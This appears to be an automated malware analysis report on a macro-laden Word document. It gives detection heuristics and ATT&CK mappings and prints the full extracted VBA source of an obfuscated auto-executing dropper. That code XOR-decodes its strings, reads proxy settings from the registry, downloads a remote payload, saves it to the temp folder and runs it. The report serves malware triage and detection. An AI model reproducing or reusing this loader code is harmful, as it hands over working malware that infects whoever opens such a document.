MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1036.005 Masquerading: Match Legitimate Name or Location
The sample contains obfuscated VBA macros designed to execute automatically upon opening the document. Critical heuristics indicate that the VBA code downloads a file from an embedded URL and executes it, likely as a second-stage payload. The obfuscation and download-execute behavior are strong indicators of malicious intent.
Heuristics 9
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0)) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10178 bytes |
SHA-256: 2e424df6eaf2dfaa5b6ad3349598805d3ffb5cf1ab168b7c94ac81296768f34b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
45 of 88 identifiers look randomly generated (e.g. 'SvVvgsFrlBFOMPTKXpPXCJCKl') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wXuyQD").Value <> "yolo" Then
SlbXxVyyHeBrskJcBvSxcRITl
ActiveDocument.Variables("wXuyQD").Value = "yolo"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
Attribute VB_Name = "RisioCV"
Private Function DNvFQksVvu(sFhiZmBXeg As Variant, hkpuWxBqrE As Integer)
Dim VuWInWOQHZ, xxOyfGcwMe As String, CTRBizosjQ, VaKobBBMTv
xxOyfGcwMe = ActiveDocument.Variables("wXuyQD").Value()
VuWInWOQHZ = ""
CTRBizosjQ = 1
While CTRBizosjQ < UBound(sFhiZmBXeg) + 2
VaKobBBMTv = CTRBizosjQ Mod Len(xxOyfGcwMe): If VaKobBBMTv = 0 Then VaKobBBMTv = Len(xxOyfGcwMe)
VuWInWOQHZ = VuWInWOQHZ + Chr(Asc(Mid(xxOyfGcwMe, VaKobBBMTv + hkpuWxBqrE, 1)) Xor CInt(sFhiZmBXeg(CTRBizosjQ - 1)))
CTRBizosjQ = CTRBizosjQ + 1
Wend
DNvFQksVvu = VuWInWOQHZ
End Function
Function MmbOAtxextHtZGBPECnnwvPel(kfcKDiyDtDThbTJekXWCsRhJb, WgkEGxbzBoXEbGLgrgmGFPpch)
AxytWKgKokKUdnneUwTwvJgcR = kfcKDiyDtDThbTJekXWCsRhJb.Items
For OWjQuNHJLXscrkfpgapRDrrgR = 0 To kfcKDiyDtDThbTJekXWCsRhJb.Count - 1
If AxytWKgKokKUdnneUwTwvJgcR(OWjQuNHJLXscrkfpgapRDrrgR) = WgkEGxbzBoXEbGLgrgmGFPpch Then
MmbOAtxextHtZGBPECnnwvPel = True
Exit For
End If
Next
MmbOAtxextHtZGBPECnnwvPel = False
End Function
Dim bxRiElaeQvRXBNGnaFGjwfbJm
Sub rqXUQfNbTIMRtyppMqmOSHkvB()
Dim vcDddGwdlsmvFOhmFRDuQdDRm
Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set dPpuQjBcGmbEXdYahaccmddob = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 45, 45, 21, 34, 95, 46, 13, 21, 40, 26), 0))
Dim IHOjWxSdqTagfSmMymycwcuSe: IHOjWxSdqTagfSmMymycwcuSe = 0
Dim SaZMETGnObJFvwwyZsXdIRDpa: SaZMETGnObJFvwwyZsXdIRDpa = ""
Dim uHevxtKKuiSSzmOVAKLaZPioV: uHevxtKKuiSSzmOVAKLaZPioV = ""
On Error Resume Next
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 37, 15, 13, _
44, 28, 31, 1, 7, 11, 20, 28, 112, 55, 20, 3, 35, 57, 49, 60, 11, 29, 49, 47, _
8, 21), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 3, 38, 50, _
23, 33, 63, 13, 34, 49, 31, 5, 101, 59, 14, 59, 12, 34, 9, 40, 14, 14, 51, 2, _
23, 34), 0))
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
If Err.Number <> 0 Then
Err.Clear
End If
Const dCqUlTTtIgxrTPPMLtNsIQTFf = &H80000003
xBkzjDZSgJsmmEJNtvDxOYUaL = DNvFQksVvu(Array(69), 0)
Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _
11, 1, 24, 6, 29, 29, 24, 75, 7, 58, 17, 60, 57, 53, 6, 42, 23, 34, 83, 60, _
66, 40, 6), 0) _
& xBkzjDZSgJsmmEJNtvDxOYUaL & DNvFQksVvu(Array(55, 10, 27, 25, 26, 11, 5, 60, 45, 39, 28, 40, 2, 108, 101, 53, 7, 38, 63, 4, 18, _
22, 0, 34), 0))
uBcpRCqjntTUeLjijfZzAatnD = ""
PMFuSKVNGVoPRbHdBmpqEzNjr.EnumKey dCqUlTTtIgxrTPPMLtNsIQTFf, uBcpRCqjntTUeLjijfZzAatnD, sQENbjrDlsCSrslEMAoVLhgZX
For Each QylTGyrFWucaDlsHZADvDRUKn In sQENbjrDlsCSrslEMAoVLhgZX
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
23, 23, 12, 123, 4, 55, 51, 52, 44, 32, 46, 41, 34, 20, 28, 1, 46, 5, 54, 51, _
40, 11, 15, 54, 8), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
49, 62, 51, 64, 57, 23, 63, 17, 22, 43, 55, 60, 46, 14, 36, 46, 53, 61, 34, 54, _
59, 9, 34, 41, 63), 0))
If Not MmbOAtxextHtZGBPECnnwvPel(dPpuQjBcGmbEXdYahaccmddob, uHevxtKKuiSSzmOVAKLaZPioV) Then
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
End If
If Err.Number <> 0 Then
Err.Clear
End If
Next
Set bxRiElaeQvRXBNGnaFGjwfbJm = dPpuQjBcGmbEXdYahaccmddob
Set vcDddGwdlsmvFOhmFRDuQdDRm = Nothing
End Sub
Function YjYdLWRvwTbgNyxJurVoCmQfT(MRkXboNAfYFWdVPWuxRZtGhNI, SvVvgsFrlBFOMPTKXpPXCJCKl, jMBxWxrXssxuIkGzQiKSQratt, riUNWjDIzOELpPwvcmcjCMkZa)
On Error Resume Next
Dim XMChsfNKHVQniAhVXJMJOLPbT
Set XMChsfNKHVQniAhVXJMJOLPbT = CreateObject(DNvFQksVvu(Array(38, 11, 12, 27, 2, 101, 79, 10, 46, 52, 31, 33, 4, 14, 123, 13, 43, 32, 14, 51, 108, _
82, 65, 100), 0))
If Err.Number <> 0 Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
Err.Clear
Exit Function
End If
Dim ErIvgrGUTuHXMPzAmejKGjMGU: ErIvgrGUTuHXMPzAmejKGjMGU = 0
Do While ErIvgrGUTuHXMPzAmejKGjMGU < UBound(jMBxWxrXssxuIkGzQiKSQratt)
Err.Clear
AxytWKgKokKUdnneUwTwvJgcR = bxRiElaeQvRXBNGnaFGjwfbJm.Items
For qvOdZTkyhJvZIIeTrBVuCaqKW = -1 To bxRiElaeQvRXBNGnaFGjwfbJm.Count - 1
Err.Clear
rujCcoXqvOcvVNWgcacaVtOze = jMBxWxrXssxuIkGzQiKSQratt(ErIvgrGUTuHXMPzAmejKGjMGU) & riUNWjDIzOELpPwvcmcjCMkZa
XMChsfNKHVQniAhVXJMJOLPbT.setOption 2, 13056
XMChsfNKHVQniAhVXJMJOLPbT.setTimeouts 0, 0, 0, 0
XMChsfNKHVQniAhVXJMJOLPbT.Open MRkXboNAfYFWdVPWuxRZtGhNI, rujCcoXqvOcvVNWgcacaVtOze, False
If qvOdZTkyhJvZIIeTrBVuCaqKW <> -1 Then
XMChsfNKHVQniAhVXJMJOLPbT.setProxy 2, AxytWKgKokKUdnneUwTwvJgcR(qvOdZTkyhJvZIIeTrBVuCaqKW), ""
End If
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 16, 21, 4, 29, 50, 21), 0), DNvFQksVvu(Array(30, 12, 18, 91, 86), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 24, 11, 52, 21, 48, 36, 40), 0), DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0), DNvFQksVvu(Array(88, 72, 68), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 2, 11, 57, 21, 116, 31, 63, 25, 33), 0), DNvFQksVvu(Array(10, 8, 4, 26, 7, 52, 0, 45, 34, 41, 7, 107, 14, 123, 65, 54, 20, 89, 60, 12, 48, _
9, 66, 33, 17, 7, 29, 26, 21, 1, 51, 4, 61), 0)
XMChsfNKHVQniAhVXJMJOLPbT.Send (SvVvgsFrlBFOMPTKXpPXCJCKl)
If XMChsfNKHVQniAhVXJMJOLPbT.ReadyState <> 4 Then
XMChsfNKHVQniAhVXJMJOLPbT.WaitForResponse 30
End If
If Err.Number = 0 Then
If XMChsfNKHVQniAhVXJMJOLPbT.Status = 200 Then
If XMChsfNKHVQniAhVXJMJOLPbT.StatusText = DNvFQksVvu(Array(36, 51), 0) Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Exit Function
End If
End If
End If
Next
ErIvgrGUTuHXMPzAmejKGjMGU = ErIvgrGUTuHXMPzAmejKGjMGU + 1
Loop
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
End Function
Sub HFrkveFgejmygVlsXhAOcnSPx(jrFWnTBceRnkTVqSUzeczwRwe, SsuzikMLBesCbOGBzsJCzdtwf)
Set hpdXRaICBrMidysNqWZvKUKvp = CreateObject(DNvFQksVvu(Array(42, 60, 59, 50, 44, 121, 50, 45, 57, 35, 8, 41), 0))
hpdXRaICBrMidysNqWZvKUKvp.Open
hpdXRaICBrMidysNqWZvKUKvp.Type = 1
If IsEmpty(jrFWnTBceRnkTVqSUzeczwRwe) Then
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
Exit Sub
End If
hpdXRaICBrMidysNqWZvKUKvp.Write jrFWnTBceRnkTVqSUzeczwRwe
hpdXRaICBrMidysNqWZvKUKvp.Position = 0
hpdXRaICBrMidysNqWZvKUKvp.SaveToFile SsuzikMLBesCbOGBzsJCzdtwf
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
End Sub
Sub SlbXxVyyHeBrskJcBvSxcRITl()
On Error Resume Next
Dim CyIZJzUpHiMUQXCqfyyLedgCP(), euEvLXdRrPZPHrgjUzJJvTeYI, tLmgYQsmxrfyqFHvGJTxWguUN, orZFdNDAWAWXpavOWxzpbBuwp
ReDim CyIZJzUpHiMUQXCqfyyLedgCP(1)
rqXUQfNbTIMRtyppMqmOSHkvB
Set tLmgYQsmxrfyqFHvGJTxWguUN = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set orZFdNDAWAWXpavOWxzpbBuwp = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 47, 45, 26, 51, 101, 56, 16, 0, 63, 14, 13, _
6, 5, 49, 0, 31), 0)).GetSpecialFolder(2)
euEvLXdRrPZPHrgjUzJJvTeYI = DNvFQksVvu(Array(18, 23, 24, 25, 64, 50, 25, 60), 0)
orZFdNDAWAWXpavOWxzpbBuwp = orZFdNDAWAWXpavOWxzpbBuwp & DNvFQksVvu(Array(55), 0) & euEvLXdRrPZPHrgjUzJJvTeYI
CyIZJzUpHiMUQXCqfyyLedgCP(0) = DNvFQksVvu(Array(3, 12, 0, 6, 84, 120, 78, 46, 60, 49, 71, 41, 23, 53, 68, 46, 16, 27, 60, 23, 108, _
3, 30, 123), 0)
UDRLgTLOgzgBjhNHSljHQryNY = YjYdLWRvwTbgNyxJurVoCmQfT(DNvFQksVvu(Array(44, 61, 32), 0), "", CyIZJzUpHiMUQXCqfyyLedgCP, DNvFQksVvu(Array(17, 87, 22, 25, 26, 121, 4, 33, 46), 0))
HFrkveFgejmygVlsXhAOcnSPx UDRLgTLOgzgBjhNHSljHQryNY, orZFdNDAWAWXpavOWxzpbBuwp
tLmgYQsmxrfyqFHvGJTxWguUN.Run (orZFdNDAWAWXpavOWxzpbBuwp)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.